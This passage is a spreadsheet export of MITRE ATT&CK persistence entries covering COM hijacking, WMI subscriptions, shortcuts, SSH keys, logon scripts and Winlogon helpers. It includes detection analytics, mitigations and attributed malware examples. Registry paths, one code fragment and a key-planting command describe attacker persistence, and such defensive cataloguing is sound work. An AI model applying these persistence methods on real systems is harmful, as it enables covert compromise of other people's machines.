[BBSRAT](https://attack.mitre.org/software/S0127) has been seen persisting via COM hijacking through replacement of the COM object for MruPidlList &lt;code&gt;{42aedc87-2188-41fd-b9a3-0c966feabec1}&lt;/code&gt; or Microsoft WBEM New Event Subsystem &lt;code&gt;{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}&lt;/code&gt; depending on the system's CPU architecture.(Citation: Palo Alto Networks BBSRAT)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location &lt;code&gt;HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32&lt;/code&gt;.(Citation: NorthSec 2015 GData Uroburos Tools)
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) can use COM hijacking to establish persistence.(Citation: Kaspersky WIRTE November 2021)
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has modified ComSysApp service to load the malicious DLL payload.(Citation: Medium KONNI Jan 2020)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) uses COM hijacking as a method of persistence.(Citation: ESET Turla Mosquito Jan 2018)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) has created the `HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32` Registry key for persistence.(Citation: Bitdefender FunnyDream Campaign November 2020)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey("Software\\Classes\\CLSID\\{" + clsid + "}\\InProcServer32")`.(Citation: GitHub SILENTTRINITY Modules July 2019)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) has created the `HKEY_CURRENT_USER\Software\Classes\CLSID\{E6D34FFC-AD32-4d6a-934C-D387FA873A19}` Registry key for persistence.(Citation: HP SVCReady Jun 2022)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670)  can perform COM hijacking by setting the path to itself to the `HKCU\Software\Classes\Folder\shell\open\command` key with a `DelegateExecute` parameter.(Citation: Check Point Warzone Feb 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for the registration or joining of new device objects in Active Directory. Raise alerts when new devices are registered or joined without using MFA.(Citation: Microsoft Azure AD Security Operations for Devices)
Command Execution
Monitor executed commands and arguments for suspicious commands to modify accounts or account settings (including files such as the `authorized_keys` or `/etc/ssh/sshd_config`).
Monitor executed commands and arguments of suspicious commands (such as `Add-MailboxPermission`) that may be indicative of modifying the permissions of Exchange and other related service settings.
File Modification
Monitor for changes made to files related to account settings, such as `/etc/ssh/sshd_config` and the authorized_keys file for each user on a system.
Group Modification
Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.
Process Creation
Monitor for newly constructed processes indicative of modifying account settings, such as those that modify `authorized_keys` or `/etc/ssh/sshd_config` files.
User Account Modification
Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670. Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ or that include additional flags such as changing a password without knowledge of the old password._x005F_x000D_
_x005F_x000D_
Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts.
Network Segmentation
Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.
Operating System Configuration
Protect domain controllers by ensuring proper security configuration for critical servers to limit access by potentially unnecessary protocols and services, such as SMB file sharing.
Privileged Account Management
Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.
User Account Management
Ensure that low-privileged user accounts do not have permissions to modify accounts or account-related policies.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used the `sp_addlinkedsrvlogin` command in MS-SQL to create a link between a created account and other servers in the network.(Citation: Dragos Crashoverride 2018)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has been known to add created accounts to local admin groups to maintain elevated access.(Citation: aptsim)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has added user accounts to the User and Admin groups.(Citation: FireEye APT41 Aug 2019) 
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has added newly created accounts to the administrators group to maintain elevated access.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has assigned newly created accounts the sysadmin role to maintain persistence.(Citation: Sygnia Elephant Beetle Jan 2022)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has granted privileges to domain accounts.(Citation: Volexity Exchange Marauder March 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has added accounts to specific groups with &lt;code&gt;net localgroup&lt;/code&gt;.(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has added a user named DefaultAccount to the Administrators and Remote Desktop Users groups.(Citation: DFIR Report APT35 ProxyShell March 2022)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) adds permissions and remote logins to all users.(Citation: Symantec Calisto July 2018)
Mimikatz
The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The &lt;code&gt;LSADUMP::ChangeNTLM&lt;/code&gt; and &lt;code&gt;LSADUMP::SetNTLM&lt;/code&gt; modules can also manipulate the password hash of an account without knowing the clear text value.(Citation: Adsecurity Mimikatz Guide)(Citation: Metcalf 2015)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has added user accounts to local Admin groups.(Citation: FireEye SMOKEDHAM June 2021)
ServHelper
[ServHelper](https://attack.mitre.org/software/S0382) has added a user named "supportaccount" to the Remote Desktop Users and Administrators groups.(Citation: Proofpoint TA505 Jan 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent)
Process Creation
Monitor newly executed processes that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).
Note: Windows Event ID 4688 (A new process has been created) and Sysmon Event ID 1 (Process creation) can be used to alert on processes created by WMI event subscription triggers by filtering on events with a parent process name of WmiPrvSe.exe.
WMI Creation
Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI &lt;code&gt;EventFilter&lt;/code&gt;, &lt;code&gt;EventConsumer&lt;/code&gt;, and &lt;code&gt;FilterToConsumerBinding&lt;/code&gt; events. Event ID 5861 is logged on Windows 10 systems when new &lt;code&gt;EventFilterToConsumerBinding&lt;/code&gt; events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent malware from abusing WMI to attain persistence.(Citation: win10_asr)
Privileged Account Management
Prevent credential overlap across systems of administrator and privileged accounts.(Citation: FireEye WMI 2015)
User Account Management
By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI.
Operation Ghost
During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used WMI event subscriptions to establish persistence for malware.(Citation: ESET Dukes October 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used a WMI event filter to invoke a command-line event consumer at system boot time to launch a backdoor with `rundll32.exe`.(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: Microsoft 365 Defender Solorigate)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used WMI event subscriptions for persistence.(Citation: Mandiant No Easy Breach)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has attempted to use WMI event subscriptions to establish persistence on compromised hosts.(Citation: Microsoft Holmium June 2020)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.(Citation: RedCanary Mockingbird May 2020)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used WMI event subscriptions for persistence.(Citation: Bitdefender FIN8 July 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used WMI for persistence.(Citation: FireEye Periscope March 2018)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has established persistence through the use of a WMI event subscription combined with unusual living-off-the-land binaries such as `cdb.exe`.(Citation: SentinelLabs Metador Sept 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129)'s custom ORat tool uses a WMI event consumer to maintain persistence.(Citation: Secureworks BRONZE PRESIDENT December 2019)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used WMI event filters and consumers to establish persistence.(Citation: ESET Turla PowerShell May 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can use WMI event subscriptions for persistence.(Citation: BitDefender BADHATCH Mar 2021)
POSHSPY
[POSHSPY](https://attack.mitre.org/software/S0150) uses a WMI event subscription to establish persistence.(Citation: FireEye POSHSPY April 2017)
POWERTON
[POWERTON](https://attack.mitre.org/software/S0371) can use WMI for persistence.(Citation: FireEye APT33 Guardrail)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) has the ability to persist on a system using WMI events.(Citation: GitHub PoshC2)
RegDuke
[RegDuke](https://attack.mitre.org/software/S0511) can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.(Citation: ESET Dukes October 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a WMI Event to execute a payload for persistence.(Citation: GitHub SILENTTRINITY Modules July 2019)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) can use a WMI event filter to invoke a command-line event consumer to gain persistence.(Citation: Bitdefender Sardonic Aug 2021)
SeaDuke
[SeaDuke](https://attack.mitre.org/software/S0053) uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.(Citation: FireEye WMI 2015)
TrailBlazer
[TrailBlazer](https://attack.mitre.org/software/S0682) has the ability to use WMI for persistence.(Citation: CrowdStrike StellarParticle January 2022)
adbupd
[adbupd](https://attack.mitre.org/software/S0202) can use a WMI script to achieve persistence.(Citation: Microsoft PLATINUM April 2016)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) registered a WMI event subscription consumer called "hard_disk_stat" to establish persistence.(Citation: SentinelLabs Metador Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Modification
Monitor the creation and modification of cloud resources that may be abused for persistence, such as functions and workflows monitoring cloud events.
Command Execution
Monitor executed commands and arguments that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.
File Creation
Monitor newly constructed files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.
File Modification
Monitor for changes made to files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.
Module Load
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process.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
Process Creation
Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.
WMI Creation
Monitor for newly constructed WMI Objects that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.
Windows Registry Key Modification
Monitor for changes made to windows registry keys and/or values that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can set up S3 bucket notifications to trigger a malicious Lambda function when a CloudFormation template is uploaded to the bucket. It can also create Lambda functions that trigger upon the creation of users, roles, and groups.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence through executing malicious commands triggered by a user’s shell.
File Creation
Monitor for newly constructed files that may establish persistence through executing malicious commands triggered by a user’s shell. For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the &lt;code&gt;/etc/shells&lt;/code&gt; file.
File Modification
Monitor for changes to &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt;, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor)
Process Creation
Monitor newly executed processes that may establish persistence through executing malicious commands triggered by a user’s shell.
Restrict File and Directory Permissions
Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells. (Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
Linux Rabbit
[Linux Rabbit](https://attack.mitre.org/software/S0362) maintains persistence on an infected machine through rc.local and .bashrc files. (Citation: Anomali Linux Rabbit 2018)
RotaJakiro
When executing with non-root level permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) can install persistence by adding a command to the .bashrc file that executes a binary in the  `${HOME}/.gvfsd/.profile/` folder.(Citation: RotaJakiro 2021 netlab360 analysis)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic) Analysis should attempt to relate shortcut creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.
File Modification
Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.
Process Creation
Monitor for newly executed processes that may create or edit shortcuts to run a program during system boot or user login.
User Account Management
Limit permissions for who can create symbolic links in Windows to appropriate groups such as Administrators and necessary groups for virtualization. This can be done through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create symbolic links. (Citation: UCF STIG Symbolic Links)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has modified LNK shortcuts.(Citation: FireEye APT39 Jan 2019)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.(Citation: McAfee Lazarus Resurfaces Feb 2018)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373)'s initial payload is a malicious .LNK file. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)
BACKSPACE
[BACKSPACE](https://attack.mitre.org/software/S0031) achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.(Citation: FireEye APT30)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can establish persistence by writing shortcuts to the Windows Startup folder.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
BlackEnergy
The [BlackEnergy](https://attack.mitre.org/software/S0089) 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.(Citation: F-Secure BlackEnergy 2014)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) establishes persistence via a .lnk file in the victim’s startup path.(Citation: Palo Alto Comnie)
Empire
[Empire](https://attack.mitre.org/software/S0363) can persist by modifying a .LNK file to include a backdoor.(Citation: Github PowerShell Empire)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) creates a .LNK file for persistence.(Citation: ESET GreyEnergy Oct 2018)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can write or modify browser shortcuts to enable launching of malicious browser extensions.(Citation: IBM Grandoreiro April 2020) 
Helminth
[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut.(Citation: Palo Alto OilRig May 2016)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can use a .lnk shortcut for the Control Panel to establish persistence.(Citation: ESET InvisiMole June 2020)
KONNI
A version of [KONNI](https://attack.mitre.org/software/S0356) drops a Windows shortcut on the victim’s machine to establish persistence.(Citation: Talos Konni May 2017)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) adds a .lnk file to the Windows startup folder.(Citation: Unit 42 Kazuar May 2017)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) creates a shortcut to maintain persistence.(Citation: Talos Micropsia June 2017)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019)
Reaver
[Reaver](https://attack.mitre.org/software/S0172) creates a shortcut file and saves it in a Startup folder to establish persistence.(Citation: Palo Alto Reaver Nov 2017)
RedLeaves
[RedLeaves](https://attack.mitre.org/software/S0153) attempts to add a shortcut file in the Startup folder to achieve persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Accenture Hogfish April 2018)
RogueRobin
[RogueRobin](https://attack.mitre.org/software/S0270) establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) may create the file &lt;code&gt;%HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk&lt;/code&gt;, which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory.(Citation: Cylance Dust Storm)
SHIPSHAPE
[SHIPSHAPE](https://attack.mitre.org/software/S0028) achieves persistence by creating a shortcut in the Startup folder.(Citation: FireEye APT30)
SPACESHIP
[SPACESHIP](https://attack.mitre.org/software/S0035) achieves persistence by creating a shortcut in the current user's Startup folder.(Citation: FireEye APT30)
SeaDuke
[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)
SslMM
To establish persistence, [SslMM](https://attack.mitre.org/software/S0058) identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.(Citation: Baumgartner Naikon 2015)
TinyZBot
[TinyZBot](https://attack.mitre.org/software/S0004) can create a shortcut in the Windows startup folder for persistence.(Citation: Cylance Cleaver)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Creation
Monitor for the registration or joining of new device objects in Active Directory. Raise alerts when new devices are registered or joined without using MFA.(Citation: Microsoft Azure AD Security Operations for Devices)
Application Log Content
Azure AD creates several log entries when new devices are enrolled, which can be monitored for unexpected device registrations.(Citation: AADInternals - BPRT) Additionally, joined devices can be viewed via the Azure AD portal.(Citation: Microsoft Manage Device Identities)
User Account Modification
Monitor user accounts for new and suspicious device associations, such as those originating from unusual sources, occurring at unusual times, or following a suspicious login.(Citation: Microsoft DEV-0537) 
Multi-factor Authentication
Require multi-factor authentication to register devices in Azure AD.(Citation: Microsoft - Device Registration) Configure multi-factor authentication systems to disallow enrolling new devices for inactive accounts.(Citation: CISA MFA PrintNightmare) When first enrolling MFA, use conditional access policies to restrict device enrollment to trusted locations or devices, and consider using temporary access passes as an initial MFA solution to enroll a device.(Citation: Mandiant APT29 Microsoft 365 2022)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) registered devices for MFA to maintain persistence through victims' VPN.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) registered devices in order to enable mailbox syncing via the `Set-CASMailbox` command.(Citation: Volexity SolarWinds)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has enrolled a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account.(Citation: Mandiant APT29 Microsoft 365 2022)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can register a device to Azure AD.(Citation: AADInternals Documentation)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments to modify the authorized_keys or /etc/ssh/sshd_config files.
File Modification
Monitor for changes made to detect changes made to the authorized_keys file for each user on a system. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.
Process Creation
Monitor for suspicious processes modifying the authorized_keys or /etc/ssh/sshd_config files.
Disable or Remove Feature or Program
Disable SSH if it is not necessary on a host or restrict SSH access for specific users/groups using &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Restrict File and Directory Permissions
Restrict access to the &lt;code&gt;authorized_keys&lt;/code&gt; file.
User Account Management
In cloud environments, ensure that only users who explicitly require the permissions to update instance metadata or configurations can do so.
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.(Citation: TrendMicro EarthLusca 2022)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has added RSA keys in &lt;code&gt;authorized_keys&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)(Citation: Cisco Talos Intelligence Group)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) creates a new key pair with &lt;code&gt;ssh-keygen&lt;/code&gt; and drops the newly created user key in &lt;code&gt;authorized_keys&lt;/code&gt; to enable remote login.(Citation: MacKeeper Bundlore Apr 2019)
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) has the ability to add the public key of its handlers to the &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on an infected host.(Citation: Trend Micro Skidmap)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) will create an ssh key if necessary with the &lt;code&gt;ssh-keygen -t rsa -f $HOME/.ssh/id_rsa -P&lt;/code&gt; command. [XCSSET](https://attack.mitre.org/software/S0658) will upload a private key file to the server to remotely access the host without a password.(Citation: trendmicro xcsset xcode project 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes made in the Active Directory that may use network logon scripts automatically executed at logon initialization to establish persistence.
Command Execution
Monitor executed commands and arguments for logon scripts
File Creation
Monitor for newly constructed files by unusual accounts outside of normal administration duties
File Modification
Monitor for changes made to files for unexpected modifications to unusual accounts outside of normal administration duties  
Process Creation
Monitor for newly constructed processes and/or command-lines that execute logon scripts
Restrict File and Directory Permissions
Restrict write access to logon scripts to specific administrators.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for logon scripts
Process Creation
Monitor for newly constructed processes and/or command-lines that execute logon scripts
Windows Registry Key Creation
Monitor for the creation/modification to Registry keys associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Restrict Registry Permissions
Ensure proper permissions are set for Registry hives to prevent users from modifying keys for logon scripts that may lead to persistence.
APT28
An [APT28](https://attack.mitre.org/groups/G0007) loader Trojan adds the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; to establish persistence.(Citation: Unit 42 Playbook Dec 2017)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has added persistence by registering the file name for the next stage malware under &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.(Citation: Morphisec Cobalt Gang Oct 2018)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence via adding a Registry key with a logon script &lt;code&gt;HKEY_CURRENT_USER\Environment "UserInitMprLogonScript" &lt;/code&gt;.(Citation: ESET Attor Oct 2019)
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered a Windows shell script under the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; to establish persistence.(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key to execute logon scripts.(Citation: Cybereason Kimsuky November 2020)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) performs persistence with a logon script via adding to the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.(Citation: ESET Zebrocy Nov 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
&lt;h4&gt;Analytic 1 - Modification of the Winlogon Registry Key&lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter processes where (event_id == "1" OR event_id == "4688") 
  AND
  (ProcessCommandLine LIKE '%Microsoft\Windows NT\CurrentVersion\Winlogon%' AND
     (ProcessCommandLine LIKE '%Userinit%' OR ProcessCommandLine LIKE '%Shell%' OR ProcessCommandLine LIKE '%Notify%'))
  AND
  (ProcessCommandLine LIKE '%reg%' OR ProcessCommandLine LIKE '%add%' OR ProcessCommandLine LIKE '%/d%' OR
   ProcessCommandLine LIKE '%Set-ItemProperty%' OR ProcessCommandLine LIKE '%New-ItemProperty%' ProcessCommandLine LIKE '%-value%')&lt;/code&gt;
Module Load
New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Windows Registry Key Modification
Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)
&lt;h4&gt;Analytic 1 - Modification of the Winlogon Registry Key&lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter registry where event_id == "13" AND
  (RegistryKeyPath LIKE '%Userinit%' OR RegistryKeyPath LIKE '%Shell%' OR RegistryKeyPath LIKE '%Notify%') &lt;/code&gt;
Execution Prevention
Identify and block potentially malicious software that may be executed through the Winlogon helper process by using application control (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.
User Account Management
Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; and sets the value to establish persistence.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) established persistence by adding a Shell value under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has established persistence using Userinit by adding the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.(Citation: FireEye KEGTAP SINGLEMALT October 2020)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can use Winlogon Helper DLL to establish persistence.(Citation: Zscaler Bazar September 2020)
Cannon
[Cannon](https://attack.mitre.org/software/S0351) adds the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt; to establish persistence.(Citation: Unit42 Cannon Nov 2018)
DarkTortilla
 [DarkTortilla](https://attack.mitre.org/software/S1066) has established persistence via the `Software\Microsoft\Windows NT\CurrentVersion\Winlogon` registry key.(Citation: Secureworks DarkTortilla Aug 2022)
Dipsind
A [Dipsind](https://attack.mitre.org/software/S0200) variant registers as a Winlogon Event Notify DLL to establish persistence.(Citation: Microsoft PLATINUM April 2016)
Gazer
